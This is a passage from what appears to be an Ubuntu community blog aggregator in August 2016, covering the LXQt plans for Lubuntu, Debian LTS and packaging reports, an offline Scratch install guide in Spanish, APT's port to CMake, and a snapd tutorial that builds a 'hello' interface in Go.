Thu Sep 08 CHECK OUT 11:00 AM

Cost: £360 each, about €420 each

If you’d like to stay with cool KDE people in a (gentle) party flat, send me an e-mail.



on August 18, 2016 03:17 PM

Earlier this year when I was in Austin, my friend Andy Sernovitz introduced me to a new startup called data.world.

What caught my interest is that they are building a platform to make data science and discovery easier, more accessible, and more collaborative. I love these kinds of big juicy challenges!

Recently I signed them up as a client to help them build their community, and I want to share a few words about why I think they are important, not just for data science fans, but from a wider scientific discovery perspective.


Armchair Discovery

Data plays a critical role in the world. Buried in rows and rows of seemingly flat content are patterns, trends, and discoveries that can help us to learn, explore new ideas, and work more effectively.

The work that leads to these discoveries is often bringing together different data sets to explore and reach new conclusions. As an example, traffic accident data for a single town is interesting, but when we combine it with data sets for national/international traffic accidents, insurance claims, drink driving, and more, we can often find patterns that can help us to influence and encourage new behavior and technology.


Many of these discoveries are hiding in plain sight. Sadly, while talented data scientists are able to pull together these different data sets, it is often hard and laborious work. Surely if we make this work easier, more accessible, consistent, and available to all we can speed up innovation and discovery?

Exactly.

As history has taught us, the right mixture of access, tooling, and community can have a tremendous impact. We have seen examples of this in open source (e.g. GitLab / GitHub), funding (e.g. Kickstarter / Indiegogo), and security (e.g. HackerOne).

data.world are doing this for data.

Data Science is Tough

There are four key areas where I think data.world can make a potent impact:

  1. Access – while there is lots of data in the world, access is inconsistent. Data is often spread across different sites and formats, and accessible to different people. We can bring this data together into a consistent platform, available to everyone.
  2. Preparation – much of the work data scientists perform is learning and prepping datasets for use. This work should be simplified, done once, and then shared with everyone, as opposed to being performed by each person who consumes the data.
  3. Collaboration – a lot of data science is fairly ad-hoc in how people work together. In much the same way open source has helped create common approaches for code, there is potential to do the same with data.
  4. Community – there is a great opportunity to build a diverse global community, not just of data scientists, but also organizations, charities, activists, and armchair sleuths who, armed with the right tools and expertise, could make many meaningful discoveries.

This is what data.world is building and I find the combination of access, platform, and network effects of data and community particularly exciting.

Unlocking Curiosity

If we look at the most profound impacts technology has had in recent years it is in bubbling people’s curiosity and creativity to the surface.

When we build community-based platforms that tap into this curiosity and creativity, we generate new ideas and approaches. New ideas and approaches then become the foundation for changing how the world thinks and operates.


As one such example, open source tapped the curiosity and creativity of developers to produce a rich patchwork of software and tooling, but more importantly, a culture of openness and collaboration. While it is easy to see the software as the primary outcome, the impact of open source has been much deeper, shaping skills, education, career opportunities, business, collaboration, and more.

Enabling the same curiosity and creativity with the wealth of data we have in the world is going to be an exciting journey. Stay tuned.

The post Opening Up Data Science with data.world appeared first on Jono Bacon.

on August 18, 2016 03:00 PM

S09E25 – Golden Keys - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

It’s Episode Twenty-five of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

We’re here again!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on August 18, 2016 02:00 PM
The Lubuntu team needs your feedback! We would like to get your input on a poll we have created to gauge your usage of the Lubuntu images. Your feedback is essential in making sure we make the right decision going forward! The poll is located here: http://lubuntu.me/cd-size-poll/ The poll closes on 26 August 2016 at […]
on August 18, 2016 01:16 AM

August 17, 2016

Recently I have been working on the visual design for RCS (which stands for rich communications service) group chat. While working on the “Group Info” screen, we found ourselves wondering what the best way to display an online/offline status would be. Some of us thought text would be more explicit, but others thought it adds more noise to the screen. We decided that we needed some real data in order to make the best decision.

Usually our user testing is done by a designated researcher, but their plates are full and their projects bigger, so I decided to make my first foray into user testing. I got some tips from designers on our cloud team who had more experience with user testing: Maria Vrachni, Carla Berkers and Luca Paulina.

I then set about finding my user testing group. I chose 5 people to start with because you can uncover up to 80% of usability issues from speaking to 5 people. I tried to recruit a range of people to test with and they were:

  1. Billy: software engineer, very tech savvy and tech enthusiast.
  2. Magda: Our former PM and very familiar with our product and designs.
  3. Stefanie: Our Office Manager who knows our products but not so familiar with our designs.
  4. Rodney: Our IS Associate who is tech savvy but not familiar with our design work
  5. Ben: A copyeditor who has no background in tech or design and is a light phone user.

The tool I decided to use was InVision. It has a lot of good features and I already had some experience creating lightweight prototypes with it. I made four minimal prototypes where the group info screen had a mixture of dots versus text to represent online status, and variations in placement. I then put these on my phone so my test subjects could interact with them, feel like they were looking at a full-fledged app, and have the same expectations.


During testing, I made sure not to ask my subjects any leading questions. I only asked them very broad questions like “Do you see everything you expect to on this page?” and “Is anything unclear?”. When testing, it’s important not to lead the test subjects so they can be as objective as possible. Keeping this in mind, it was interesting to see what the testers noticed and brought up on their own, and what patterns arose.

My findings were as follows:

Online status: Text or Green Dot

They unanimously preferred the online status to be depicted with colour, and 4 out of 5 preferred the green dot to text because of its scannability.

Online status placement:

This one was close, but having the green dot next to the avatar had the edge, again because of its scannability. One tester preferred the dot next to the arrow and another didn’t have a preference on placement.

Pending status:

What was also interesting is that three out of the four thought “pending” had the wrong placement. They felt it should have the same placement as online and offline status.

Overall, it was very interesting to collect real data to support our work, and I am looking forward to the next time, which will hopefully be bigger in scope.


The finished design

on August 17, 2016 03:57 PM

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In July, 136.6 work hours have been dispatched among 11 paid contributors. Their reports are available:

  • Antoine Beaupré has been allocated 4 hours again but in the end he put back his 8 pending hours in the pool for the next months.
  • Balint Reczey did 18 hours (out of 7 hours allocated + 2 remaining, thus keeping 2 extra hours for August).
  • Ben Hutchings did 15 hours (out of 14.7 hours allocated + 1 remaining, keeping 0.7 extra hour for August).
  • Brian May did 14.7 hours.
  • Chris Lamb did 14 hours (out of 14.7 hours, thus keeping 0.7 hours for next month).
  • Emilio Pozuelo Monfort did 13 hours (out of 14.7 hours allocated, thus keeping 1.7 extra hours for August).
  • Guido Günther did 8 hours.
  • Markus Koschany did 14.7 hours.
  • Ola Lundqvist did 14 hours (out of 14.7 hours assigned, thus keeping 0.7 extra hours for August).
  • Santiago Ruano Rincón did 14 hours (out of 14.7h allocated + 11.25 remaining, the 11.95 extra hours will be put back in the global pool as Santiago is stepping down).
  • Thorsten Alteholz did 14.7 hours.

Evolution of the situation

The number of sponsored hours jumped to 159 hours per month thanks to GitHub joining as our second platinum sponsor (funding 3 days of work per month)! We are getting closer to our funding goal, but we are not there yet.

The security tracker currently lists 22 packages with a known CVE, and the dla-needed.txt file lists the same number. That’s a sharp decline compared to last month.

Thanks to our sponsors

New sponsors are in bold.


on August 17, 2016 02:45 PM

My monthly report covers a large part of what I have been doing in the free software world. I write it for my donators (thanks to them!) but also for the wider Debian community because it can give ideas to newcomers and it’s one of the best ways to find volunteers to work with me on projects that matter to me.

DebConf 16

I was in South Africa for the whole week of DebConf 16 and gave 3 talks/BoF. You can find the slides and the videos in the links of their corresponding page:

I was a bit nervous about the third BoF (on using Debian money to fund Debian projects), but I discussed it with many people during the week, and it looks like the project has evolved quite a bit in the last 10 years; while it’s still a sensitive topic (and rightfully so, given the possible impacts), people are willing to discuss the issues and to experiment. You can have a look at the gobby notes that resulted from the live discussion.

I spent most of the time discussing with people and I did not do much technical work besides trying (and failing) to fix accessibility issues with tracker.debian.org (help from knowledgeable people is welcome, see #830213).

Debian Packaging

I uploaded a new version of zim to fix a reproducibility issue (and forwarded the patch upstream).

I uploaded Django 1.8.14 to jessie-backports and had to fix a failing test (pull request).

I uploaded python-django-jsonfield 1.0.1 a new upstream version integrating the patches I prepared in June.

I managed the (small) ftplib library transition. I prepared the new version in experimental, ensured that reverse build dependencies still build, and coordinated the transition with the release team. This was all triggered by a reproducible build bug that I received and that made me look at the package… last time I looked, upstream had disappeared (the upstream URL was even gone), but it looks like he has become active again and pushed a new release.

I filed wishlist bug #832053 to request a new deblog command in devscripts. It should make it easier to display current and former build logs.

Kali related Debian work

I worked on many issues that were affecting Kali (and Debian Testing) users:

  • I made an open-vm-tools NMU to get the package back into testing.
  • I filed #830795 on nautilus and #831737 on pbnj to forward Kali bugs to Debian.
  • I wrote a fontconfig patch to make it ignore .dpkg-tmp files. I also forwarded that patch upstream and filed a related bug in gnome-settings-daemon which is actually causing the problem by running fc-cache at the wrong times.
  • I started a discussion to see how we could fix the synaptics touchpad problem in GNOME 3.20. In the end, we have a new version of xserver-xorg-input-all which only depends on xserver-xorg-input-libinput and not on xserver-xorg-input-synaptics (no longer supported by GNOME). This is after upstream refused to reintroduce synaptics support.
  • I filed #831730 on desktop-base because KDE’s plasma-desktop is no longer using the Debian background by default. I had to seek upstream help to find out a possible solution (deployed in Kali only for now).
  • I filed #832503 because the way dpkg and APT manages foo:any dependencies when foo is not marked “Multi-Arch: allowed” is counter-productive… I discovered this while trying to use a firefox-esr:any dependency. And I filed #832501 to get the desired “Multi-Arch: allowed” marker on firefox-esr.

Thanks

See you next month for a new summary of my activities.


on August 17, 2016 10:53 AM

August 15, 2016

Welcome to the Ubuntu Weekly Newsletter. This is issue #478 for the week August 8 – 14, 2016, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Athul Muralidhar
  • Chris Sirrs
  • Paul White
  • Simon Quigley
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

on August 15, 2016 09:22 PM

Convergent terminal

Canonical Design Team

We have been looking at ways of making the Terminal app more pleasing, in terms of the user experience, as well as the visuals.

I would like to share the work so far, invite users of the app to comment on the new designs, and share ideas on what other new features would be desirable.

On the visual side, we have brought the app in line with our Suru visual language. We have also adopted the very nice Solarized palette as the default palette – though this will of course be completely customisable by the user.

On the functionality side we are proposing a number of improvements:

-Keyboard shortcuts
-Ability to completely customise touch/keyboard shortcuts
-Ability to split the screen horizontally/vertically (similar to Terminator)
-Ability to easily customise the palette colours, and window transparency (on desktop)
-Unlimited history/scrollback
-Adding a “find” action for searching the history


Tabs and split screen

On larger screens tabs will be visually persistent. In addition, it’s desirable to be able to split a panel horizontally and vertically, and to use keyboard shortcuts or mouse/touch focus to move between panels.

On mobile, the tabs will be accessed through the bottom edge, as on the browser app.


Quick mobile access to shortcuts and commands

We are discussing the option of having modifier (Ctrl, Alt etc) keys working together with the on-screen keyboard on touch – which would be a very welcome addition. While this is possible to do in theory with our on-screen keyboard, it’s something that won’t land in the immediate future. In the interim, modifier key combinations will still be accessible on touch via the shortcuts at the bottom of the screen. We also want to make these shortcuts ordered by recency, and add the ability to define your own custom key shortcuts and commands.

We are also discussing with the on-screen keyboard devs about adding an app specific auto-correct dictionary – in this case terminal commands – that together with a swipe keyboard should make a much nicer mobile terminal user experience.


More themability

We would like the user to be able to define their own custom themes more easily, either via in-app settings with colour picker and theme import, or by editing a JSON configuration file. We would also like to be able to choose the window transparency (in windowed mode), as some users want a see-through terminal.

We need your help!

These visuals are work in progress – we would love to hear what kind of features you would like to see in your favourite terminal app!

Also, as Terminal app is a fully community developed project, we are looking for one or two experienced Qt/QML developers with time to contribute to lead the implementation of these designs. Please reach out to alan.pope@canonical.com or jouni.helminen@canonical.com to discuss details!

EDIT: To clarify – these proposed visuals are improvements for the community developed terminal app currently available for the phone and tablet. We hope to improve it, but it is still not as mature as older terminal apps. You should still be able to run your current favourite terminal (like gnome-terminal, Terminator etc) in Unity8.

on August 15, 2016 04:24 PM

Hello everyone. After a long time, I have allowed myself to write this article to share a recent experience with a training programme presented by www.zuliatec.com called Procodi (www.procodi.com), a training programme for children that gives them, from a very early age, tools to develop skills in software development, graphic design, digital electronics, robotics, digital media and digital music.

Scratch (as its own website says) is designed especially for ages 8 to 16, but it is used by people of all ages. Millions of people are creating Scratch projects in a wide variety of settings, including homes, schools, museums, libraries and community centres.

The site also says: the ability to write computer programs is an important part of literacy in today’s society. When people learn to program in Scratch, they learn important strategies for solving problems, designing projects, and communicating ideas.

Since this tool is so useful for children and adults alike, here is a simple explanation of how to get the program running offline on GNU/Linux.

If you use GNOME or a derivative, you need the Gnome-Keyring library installed; if you use KDE, you need Kde-Wallet.

This example shows how to get Scratch working on Linux Mint, and it should also work on other Debian-derived operating systems.

  1. First, download the Adobe AIR and Scratch for Linux installers from the official Scratch site, https://scratch.mit.edu/scratch2download/ (they are also available for Windows and Mac).
  2. Then install gnome-keyring: sudo aptitude install gnome-keyring
  3. Add two symbolic links in /usr/lib/ as follows: sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0 /usr/lib/libgnome-keyring.so.0 && sudo ln -s /usr/lib/i386-linux-gnu/libgnome-keyring.so.0.2.0 /usr/lib/libgnome-keyring.so.0.2.0
  4. From a terminal, change to the directory containing the Adobe AIR installer and run: chmod +x AdobeAIRInstaller.bin && ./AdobeAIRInstaller.bin
  5. Follow all the steps the installer shows you, and be a little patient.
  6. Once Adobe AIR is installed, find the Scratch-448.air file in your file manager and open it with the Adobe AIR Application Installer. Again, be a little patient; when it finishes, it will create a shortcut on your desktop from which you can open the application whenever you like.

With the above you can now use Scratch offline, but remember that, as you may have noticed on the project’s official website, it can also be used online.

Happy Hacking.


on August 15, 2016 11:03 AM

A while back, I found myself in need of some TLS certificates set up and issued for a testing environment.

I remembered there was some code for issuing TLS certs in Docker, so I yanked some of that code and made a sensible CLI API over it.

Thus was born minica!

Something as simple as minica tag@domain.tld domain.tld will issue two TLS certs (one with a Client EKU, and one server cert) from a single CA.

Next time you’re in need of a few TLS keys (without having to worry about stuff like revocation or anything), this might be the quickest way out!

on August 15, 2016 12:40 AM

August 13, 2016

This blog post is not an announcement of any kind or even an official plan. This may even be outdated, so check the links I provide for additional info.

As you may have seen, the Lubuntu team (which I am a part of) has started the migration process to LXQt. It's going to be a long process, but I thought I might write about some of the things that go into it.

Step 1 - Getting a metapackage

This step is already done, and the metapackage was installable in a virtual machine last time I checked. The metapackage is lubuntu-qt-desktop, but there's a lot to be desired.

While we already have this package, a lot still needs tweaking. I've been running LXQt with the Lubuntu artwork as my daily driver for a few months now, and plenty is still missing. So while you can install the package and play around with it, it needs to change quite a bit before it is really usable.

Also in this image are our candidates (not final yet) for the applications that will be included in Lubuntu.

An up-to-date listing of the software in this metapackage is available here.

Step 2 - Getting an image

The next step is getting a working image for the team to test. The two outstanding merge proposals adding this have been merged, and we're now waiting for the images to be spun up and added to the ISO QA Tracker for testers.

Having this image will help us gauge how much system resources are used, and gives us the ability to run some benchmarks on the desktop. This will come after the image is ready and spins up correctly.

Step 3 - Testing

An essential part of any good operating system is the testing. We need to create some LXQt-specific test cases and make sure the ISO QA test cases are working before we can release a reliable image to our users.

As mentioned before, we need test cases. We created a blueprint last cycle tracking our progress with test cases, and the sooner that those are done, the sooner Lubuntu can make the switch knowing that all of our selected applications work fine.

Step 4 - Picking applications

This is the toughest step of all. We need to pick the applications that best suit our users' use cases (a lot of our users run on older hardware) and needs (LibreOffice, for example). Every application will most likely need a week or two for proper benchmarking and testing, but if you have a suggestion for an application that you would like to see in Lubuntu, share your feedback on the blueprints. This is the best way to let us know what you would like to see, and to give your feedback on the existing applications, before we make a final decision.

Final thoughts

I've been using LXQt for a while now, and it has a lot of advantages not only in applications, but the desktop itself. Depending on how notable some things are, I might do a blog post in the future, otherwise, see for yourself. :)

Here is our blueprint, which will be updated a lot in the next week or so and will tell you more about the transition. If you have any questions, shoot me an email at tsimonq2@lubuntu.me or send an email to the Lubuntu-devel mailing list.

I'm really excited for this transition, and I hope you are too.

on August 13, 2016 06:18 PM

August 11, 2016

S09E24 – Elementary Penguin - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

It’s Episode Twenty-four of Season Nine of the Ubuntu Podcast! Mark Johnson, Alan Pope, Laura Cowen, and Martin Wimpress are here again.

We’re here – all of us!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on August 11, 2016 02:00 PM

I recently discovered Martin O’Leary‘s Feeling Old twitter bot,1 which has a big list of “things that have happened” and then constructs comparisons such as “Y2K was as close to the release of Return of the Jedi as to now”, to make you do that weird “wow, I am old!” double-take. As Martin says, it occasionally throws out a gem. But, looking through the list, I think that they’re probably all gems, but whether they hit home for you depends on how old you are.

Basically, the form of the sentence is: thing is closer to old thing than to today. Ideally, you want thing to be something that you think is recent, and old thing to be something that you think is ancient, and therefore you’ll be surprised that thing really isn’t actually recent and that’s because you’re a decrepit old codger.

My theory is this: old thing ought to be before you were born. By definition, anything that happens before you were born feels like a long time ago to you. And the gap between thing and old thing is the same as the gap between thing and now (because that’s what constructs the sentences). So thing has to happen in the first half of your life. Stuff that happens while you’re a young child also feels like a long time ago — you were a kid when it happened! — so we want something that happened once you started to feel like you in your head. Say, around 12 or so years of age. Thus, we take a big list of pop culture things, find an event which happened between the ages of 12 and half your current age, find a corresponding old event, display them to you, and have you be surprised and displeased. It’s a living.

Give it a try.


  1. because I was reading his excellent work on how to create accurate looking fantasy maps
on August 11, 2016 01:14 PM

I’ll start this off by mentioning that I’m on Plasma 5.7.2, so you might not see these features (yet!).

timezone-feature

Since I started working with a global team I’ve hit the unforgiving thing called time zones, so my first feature covers the ‘Digital Clock’ widget. I’m sorry to report that those of you who love the ‘Fuzzy Clock’ widget are missing out on this feature. With the Digital Clock I can add time zones by simply right-clicking the widget, whether it is already in one of your panels or on your desktop.

right-click-settings

If the widget is in the panel then you can just right-click it like so. (Look above)

left-press-hold

But if you have the widget on your desktop you have to press and hold it with left click like so. (Look above)

left-press-settings

It will turn a light blue and a pop up will well… pop up with some buttons. The bottom one is the one we want. (Look above)

digital-clock-settings

Either from the panel widget or the desktop widget we will get this window. (Look above) From here we can search for time zones by city – for example London, the capital of England, or my state, which falls into the New York time zone.

 

on August 11, 2016 03:54 AM

CORRECTION 2016.04.23 - It was previously stated that 16.04 is a point release to 14.04. This was due to a silly copy&paste issue from our previous release statement for 14.04. The Mythbuntu 16.04 release is a flavor of Ubuntu 16.04. We're sorry for any confusion this has caused.


Mythbuntu 16.04 has been released. This is our third LTS release and will be supported until shortly after the 18.04 release.

The Mythbuntu team would like to thank our ISO testers for helping find critical bugs before release. You guys rock!

With this release, we are providing torrents only. It is very important to note that this release is only compatible with MythTV 0.28 systems. The MythTV component of previous Mythbuntu releases can be upgraded to a compatible MythTV version by using the Mythbuntu Repos. For a more detailed explanation, see here.

You can get the Mythbuntu ISO from our downloads page.

Highlights

Underlying system

  • Underlying Ubuntu updates are found here

MythTV


We appreciate all comments and would love to hear what you think. Please send comments to our mailing list, post on the forums (with a tag indicating that this is from 16.04 or xenial), or join #ubuntu-mythtv on Freenode. As with previous releases, if you encounter any issues with anything in this release, please file a bug using the Ubuntu bug tool (ubuntu-bug PACKAGENAME), which automatically collects logs and other important system information, or if that is not possible, directly open a ticket on Launchpad (http://bugs.launchpad.net/mythbuntu/16.04/).

Upgrade Notes

If you have enabled the mysql tweaks in the Mythbuntu Control Center these will need to be disabled prior to upgrading. Once upgraded, these can be reenabled.

Known issues

on August 11, 2016 12:26 AM

August 10, 2016

Porting APT to CMake

Julian Andres Klode

Ever since its creation back in the dark ages, APT shipped with its own build system consisting of autoconf and a bunch of makefiles. In 2009, I felt like replacing that with something more standard, and because nobody really liked autotools, I decided to go with CMake. Well, that bazaar branch was never really merged back in 2009.

Fast forward 7 years to 2016. A few months ago, we noticed that our build system had trouble with correct dependencies in parallel building. So, in search for a way out, I picked up my CMake branch from 2009 last Thursday and spent the whole weekend working on it, and today I am happy to announce that I merged it into master:

123 files changed, 1674 insertions(+), 3205 deletions(-)

More than 1500 lines less build system code. Quite impressive, eh? This also includes about 200 fewer lines of code in debian/, as that switched from prehistoric debhelper stuff to modern dh (compat level 9, almost ready for 10).

The annoying Tale of Targets vs Files

Talking about CMake: I don’t really love it. As you might know, CMake differentiates between targets and files. Targets can in some cases depend on files (generated by a command in the same directory), but overall files are not really targets. You also cannot have a target with the same name as a file you are generating in a custom command; you have to rename your target (make is OK with the generated stuff, but ninja complains about cycles because your custom target and your custom command would have the same name).
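
A minimal sketch of that workaround, with hypothetical file, variable and target names (the real tree is more involved):

add_custom_command(
  OUTPUT apt-all.pot
  COMMAND xgettext --output=apt-all.pot ${translatable_sources}
  DEPENDS ${translatable_sources}
  COMMENT "Extracting translatable strings"
)

# Naming this driver target "apt-all.pot" would clash with the file the
# custom command generates (ninja reports a cycle), so it gets a distinct
# name and simply depends on the generated file.
add_custom_target(generate-pot ALL DEPENDS apt-all.pot)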

Byproducts for the (time) win

One interesting thing about CMake and Ninja are byproducts. In our tree, we are building C++ files. We also have .pot templates depending on them, and .mo files depending on the templates (we have multiple domains, and merge the per-domain .pot with the all-domain .po file during the build to get a per-domain .mo). Now, if we just let them depend naively, changing a C++ file causes the .pot file to be regenerated, which in turn causes us to build .mo files for every freaking language in the package. Even if nothing changed.

Byproducts solve this problem. Instead of just building the .pot file, we also create a stamp file (AKA the witness), write the .pot file (without a header) to a temporary name, and only copy it to its final name if the content changed. The .pot file is declared as a byproduct of the command.

The command doing the .pot->.mo step still depends on the .pot file (the byproduct), but as that now only changes if strings change, the .mo files only get rebuilt if I change a translatable string. We still need to ensure that the .pot file is actually built before we try to use it – the solution here is to specify a custom target depending on the witness and then have the target containing the .mo build commands depend on that target.

Now if you use make, you might know this trick already. In make, the byproducts remain undeclared, though, while in CMake we can now actually express them, and they are used by the Ninja generator and the Ninja build tool if you choose that over make (try it out, it’s fast).
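
A minimal sketch of the stamp-file pattern, again with hypothetical names (the real tree also strips the .pot header before comparing; copy_if_different stands in for that step here):

add_custom_command(
  OUTPUT apt.pot.stamp
  BYPRODUCTS apt.pot
  # Write to a temporary name first...
  COMMAND xgettext --output=apt.pot.tmp ${translatable_sources}
  # ...only touch the real .pot if the content actually changed...
  COMMAND ${CMAKE_COMMAND} -E copy_if_different apt.pot.tmp apt.pot
  # ...and always refresh the witness so the command itself is up to date.
  COMMAND ${CMAKE_COMMAND} -E touch apt.pot.stamp
  DEPENDS ${translatable_sources}
  COMMENT "Updating apt.pot only when translatable strings change"
)

# Targets that build the .mo files depend on this witness target rather
# than on the .pot file directly.
add_custom_target(update-pot DEPENDS apt.pot.stamp)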

Further Work

Some command names are hardcoded; I should find_program() them. Also, cross-building the package does not yet work successfully, but it only requires a tiny amount of patches in debhelper and/or cmake.
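
For the first point, a find_program() conversion could look roughly like this (a sketch only, using xgettext as an example; the variable name is made up):

find_program(XGETTEXT_EXECUTABLE NAMES xgettext
             DOC "xgettext tool used to extract translatable strings")
if(NOT XGETTEXT_EXECUTABLE)
  message(FATAL_ERROR "xgettext is required to build the translations")
endif()
# ...and then use ${XGETTEXT_EXECUTABLE} instead of a bare "xgettext"
# in the add_custom_command() calls.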

I also tried building the package on a Fedora docker image (with dpkg installed; it’s available in the Fedora sources). While I could eventually get the programs built and most of the integration test suite to pass, there are some minor issues to fix, mostly in the documentation building and GTest department: Fedora ships its docbook stylesheets in a different location, and ships GTest as a pre-compiled library, and not a source tree.

I have not yet tested building on exotic platforms like macOS, or even a BSD. Please do and report back. In Debian, CMake is not up-to-date enough on the non-Linux platforms to build APT due to test suite failures; I hope those can be fixed/disabled soon (it appears to be a timing issue AFAICT).

I hope that we eventually get some non-Debian backends for APT. I’d love that.


Filed under: Debian, Uncategorized
on August 10, 2016 03:52 PM

Today is a day I've been waiting for a long time. We now have enough knowledge to create our first real interface from scratch. To really understand this content you need to be familiar with parts [1], [2], [3] and [4].

We will go all the way, from branching snapd all the way to running a program that uses our new interface. We will focus on the ancillary tasks this time, the actual interface will be rather basic. Still, this knowledge will be invaluable next time where we will try to do something more complicated.

Adding the new "hello" interface


Let's get started. It all begins with snapd. If you didn't already, fork snapd and clone your fork locally. You may find this small guide that I wrote earlier useful. It goes through all those steps in detail. At the end of the exercise you should be able to build your fork of snapd (make sure it is really your fork, not the upstream version!)

Let's look around. Each time a new interface is added, the following files are modified:
  • The file interfaces/builtin/foo{,_test}.go contains the actual interface
  • The file interfaces/builtin/all{,_test}.go contains a tiny change that is used to register the new interface
In addition, if the interface slot should implicitly show up on the core snap we need to change the file snap/implicit{,_test}.go. We will get back to this.

So let's create our new interface now. As mentioned in part [3] this entails implementing a new type with a few methods. Let's do that now:

Using your favorite code editor create a new file and save it as interfaces/builtin/hello.go. Paste the following code inside:


// -*- Mode: Go; indent-tabs-mode: t -*-

/*
* Copyright (C) 2016 Canonical Ltd
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 3 as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/

package builtin

import (
	"fmt"

	"github.com/snapcore/snapd/interfaces"
)

// HelloInterface is the hello interface for a tutorial.
type HelloInterface struct{}

// String returns the same value as Name().
func (iface *HelloInterface) Name() string {
	return "hello"
}

// SanitizeSlot checks and possibly modifies a slot.
func (iface *HelloInterface) SanitizeSlot(slot *interfaces.Slot) error {
	if iface.Name() != slot.Interface {
		panic(fmt.Sprintf("slot is not of interface %q", iface))
	}
	// NOTE: currently we don't check anything on the slot side.
	return nil
}

// SanitizePlug checks and possibly modifies a plug.
func (iface *HelloInterface) SanitizePlug(plug *interfaces.Plug) error {
	if iface.Name() != plug.Interface {
		panic(fmt.Sprintf("plug is not of interface %q", iface))
	}
	// NOTE: currently we don't check anything on the plug side.
	return nil
}

// ConnectedSlotSnippet returns security snippet specific to a given connection between the hello slot and some plug.
func (iface *HelloInterface) ConnectedSlotSnippet(plug *interfaces.Plug, slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
	switch securitySystem {
	case interfaces.SecurityAppArmor:
		return nil, nil
	case interfaces.SecuritySecComp:
		return nil, nil
	case interfaces.SecurityDBus:
		return nil, nil
	case interfaces.SecurityUDev:
		return nil, nil
	case interfaces.SecurityMount:
		return nil, nil
	default:
		return nil, interfaces.ErrUnknownSecurity
	}
}

// PermanentSlotSnippet returns security snippet permanently granted to hello slots.
func (iface *HelloInterface) PermanentSlotSnippet(slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
	switch securitySystem {
	case interfaces.SecurityAppArmor:
		return nil, nil
	case interfaces.SecuritySecComp:
		return nil, nil
	case interfaces.SecurityDBus:
		return nil, nil
	case interfaces.SecurityUDev:
		return nil, nil
	case interfaces.SecurityMount:
		return nil, nil
	default:
		return nil, interfaces.ErrUnknownSecurity
	}
}

// ConnectedPlugSnippet returns security snippet specific to a given connection between the hello plug and some slot.
func (iface *HelloInterface) ConnectedPlugSnippet(plug *interfaces.Plug, slot *interfaces.Slot, securitySystem interfaces.SecuritySystem) ([]byte, error) {
	switch securitySystem {
	case interfaces.SecurityAppArmor:
		return nil, nil
	case interfaces.SecuritySecComp:
		return nil, nil
	case interfaces.SecurityDBus:
		return nil, nil
	case interfaces.SecurityUDev:
		return nil, nil
	case interfaces.SecurityMount:
		return nil, nil
	default:
		return nil, interfaces.ErrUnknownSecurity
	}
}

// PermanentPlugSnippet returns the configuration snippet required to use a hello interface.
func (iface *HelloInterface) PermanentPlugSnippet(plug *interfaces.Plug, securitySystem interfaces.SecuritySystem) ([]byte, error) {
	switch securitySystem {
	case interfaces.SecurityAppArmor:
		return nil, nil
	case interfaces.SecuritySecComp:
		return nil, nil
	case interfaces.SecurityDBus:
		return nil, nil
	case interfaces.SecurityUDev:
		return nil, nil
	case interfaces.SecurityMount:
		return nil, nil
	default:
		return nil, interfaces.ErrUnknownSecurity
	}
}

// AutoConnect returns true if plugs and slots should be implicitly
// auto-connected when an unambiguous connection candidate is available.
//
// This interface does not auto-connect.
func (iface *HelloInterface) AutoConnect() bool {
	return false
}

TIP: Any time you are making code changes use go fmt to re-format all of the code in the current working directory to the go formatting standards. Static analysis checkers in the snappy tree enforce this so your code won't be able to land without first being formatted correctly.

This code is perfectly fine, if a little verbose (we'll make it shorter eventually, I promise). Now let's make one more change to ensure the interface is known to snapd. All we need to do is to add it to the allInterfaces list in the same golang package. I've decided to just use an init() function so that all of the changes are in one file and cause fewer conflicts for other developers creating their interfaces. You can see my patch below.

diff --git a/interfaces/builtin/all_test.go b/interfaces/builtin/all_test.go
index 46ca587..86c8fad 100644
--- a/interfaces/builtin/all_test.go
+++ b/interfaces/builtin/all_test.go
@@ -62,4 +62,5 @@ func (s *AllSuite) TestInterfaces(c *C) {
c.Check(all, DeepContains, builtin.NewCupsControlInterface())
c.Check(all, DeepContains, builtin.NewOpticalDriveInterface())
c.Check(all, DeepContains, builtin.NewCameraInterface())
+ c.Check(all, Contains, &builtin.HelloInterface{})
}
diff --git a/interfaces/builtin/hello.go b/interfaces/builtin/hello.go
index d791fc5..616985e 100644
--- a/interfaces/builtin/hello.go
+++ b/interfaces/builtin/hello.go
@@ -130,3 +130,7 @@ func (iface *HelloInterface) PermanentPlugSnippet(plug *interfaces.Plug, securit
func (iface *HelloInterface) AutoConnect() bool {
return false
}
+
+func init() {
+ allInterfaces = append(allInterfaces, &HelloInterface{})
+}


Now switch to the snap/ directory, edit the file implicit.go and add "hello" to implicitClassicSlots. You can see the whole change below. I also updated the test that checks the number of implicitly added slots. This change will make snapd create a hello slot on the core snap automatically. As you can see by looking at the file, there are many interfaces that take advantage of this little trick.

diff --git a/snap/implicit.go b/snap/implicit.go
index 3df6810..098b312 100644
--- a/snap/implicit.go
+++ b/snap/implicit.go
